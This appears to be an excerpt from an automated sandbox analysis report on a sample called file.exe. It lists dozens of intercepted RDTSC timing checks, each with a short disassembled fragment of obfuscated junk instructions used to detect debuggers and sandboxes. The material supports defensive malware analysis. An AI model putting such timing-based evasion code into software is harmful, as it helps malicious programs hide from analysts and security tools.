                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4BFAB second address: E4BFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4BFAF second address: E4C00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F47DCFB8A36h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edi 0x0000001a nop 0x0000001b mov ecx, dword ptr [ebp+122D2CDAh] 0x00000021 sub edi, 02BD80DCh 0x00000027 push 0000001Eh 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F47DCFB8A38h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 mov cx, ax 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jc 00007F47DCFB8A36h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C39E second address: E4C404 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DD40FB78h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F47DD40FB78h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov ecx, ebx 0x0000002b lea eax, dword ptr [ebp+1247CD89h] 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F47DD40FB78h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b mov dx, bx 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 jo 00007F47DD40FB7Ch 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C404 second address: E4C408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C408 second address: E4C45E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F47DD40FB7Ah 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D39ACh], eax 0x00000017 lea eax, dword ptr [ebp+1247CD45h] 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F47DD40FB78h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 push eax 0x00000038 push eax 0x00000039 pushad 0x0000003a push esi 0x0000003b pop esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C45E second address: E324B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edi, di 0x0000000c call dword ptr [ebp+122D3A28h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jbe 00007F47DCFB8A36h 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E324B7 second address: E324BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E324BB second address: E324D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F47DCFB8A44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E324D5 second address: E324DF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DD40FB7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B965 second address: E8B985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F47DCFB8A46h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B985 second address: E8B98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B98F second address: E8B9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F47DCFB8A36h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BC93 second address: E8BC9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F47DD40FB76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BC9F second address: E8BCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8BCA3 second address: E8BCAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93AC1 second address: E93ADB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47DCFB8A42h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93EAE second address: E93EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9406F second address: E94073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94073 second address: E9407D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9407D second address: E94095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Eh 0x00000007 je 00007F47DCFB8A36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94095 second address: E940A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F47DD40FB76h 0x00000009 jbe 00007F47DD40FB76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9432A second address: E94333 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94333 second address: E9433A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94634 second address: E94638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E948E8 second address: E948FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F47DD40FB76h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F47DD40FB76h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E948FA second address: E948FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9892E second address: E98942 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F47DD40FB7Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98ABE second address: E98ACE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47DCFB8A36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98D60 second address: E98D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B576 second address: E9B582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F47DCFB8A36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B582 second address: E9B5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 je 00007F47DD40FB76h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F47DD40FB86h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B5B0 second address: E9B5B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B5B6 second address: E9B5BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B140 second address: E9B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B146 second address: E9B14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B14B second address: E9B155 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DCFB8A4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B2DE second address: E9B2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F47DD40FB7Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA00FB second address: EA00FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA00FF second address: EA0120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47DD40FB89h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA0120 second address: EA0139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A45h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E05DA4 second address: E05DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E05DAA second address: E05DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E05DB8 second address: E05DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB87h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F874 second address: E9F87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FE48 second address: E9FE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FE4D second address: E9FE59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F47DCFB8A36h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5DA1 second address: EA5DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA466D second address: EA468E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DCFB8A44h 0x00000009 popad 0x0000000a jnc 00007F47DCFB8A47h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA468E second address: EA469D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB7Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA469D second address: EA46C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F47DCFB8A3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F47DCFB8A40h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA498E second address: EA499A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47DD40FB76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4F1A second address: EA4F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F47DCFB8A36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4F24 second address: EA4F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F47DD40FB76h 0x0000000e jmp 00007F47DD40FB87h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA4F49 second address: EA4F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E23A second address: E0E240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E240 second address: E0E244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E244 second address: E0E26E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47DD40FB85h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E26E second address: E0E2A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F47DCFB8A6Ah 0x0000000e jns 00007F47DCFB8A50h 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F47DCFB8A36h 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E2A6 second address: E0E2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9218 second address: EA921E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA921E second address: EA923C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F47DD40FB86h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9A94 second address: EA9A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9A98 second address: EA9A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9A9E second address: EA9AA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9AA3 second address: EA9ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F47DD40FB76h 0x0000000a jmp 00007F47DD40FB82h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 jo 00007F47DD40FB76h 0x00000019 jmp 00007F47DD40FB7Ch 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9ADD second address: EA9AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9AE3 second address: EA9AFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47DD40FB82h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9AFF second address: EA9B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9B03 second address: EA9B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9B0D second address: EA9B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB0306 second address: EB030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB030A second address: EB0310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB08E7 second address: EB0903 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F47DD40FB87h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB0903 second address: EB090D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB0C05 second address: EB0C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2013 second address: EB2019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB577B second address: EB5792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB7Fh 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5792 second address: EB579F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F47DCFB8A3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB579F second address: EB57AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007F47DD40FB76h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5910 second address: EB591A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB591A second address: EB591E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5A4A second address: EB5A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F47DCFB8A36h 0x0000000d jmp 00007F47DCFB8A48h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5A6F second address: EB5A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5A73 second address: EB5A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DCFB8A45h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5BCE second address: EB5BDA instructions: 0x00000000 rdtsc 0x00000002 je 00007F47DD40FB76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5BDA second address: EB5BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5D41 second address: EB5D73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Eh 0x00000007 jmp 00007F47DD40FB7Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007F47DD40FB76h 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB601C second address: EB6022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB6022 second address: EB6027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBADC2 second address: EBADDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F47DCFB8A45h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBADDF second address: EBADE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBADE3 second address: EBADE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBADE9 second address: EBAE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F47DD40FBA5h 0x0000000d pushad 0x0000000e jp 00007F47DD40FB76h 0x00000014 jp 00007F47DD40FB76h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBAE08 second address: EBAE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC27DA second address: EC27E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
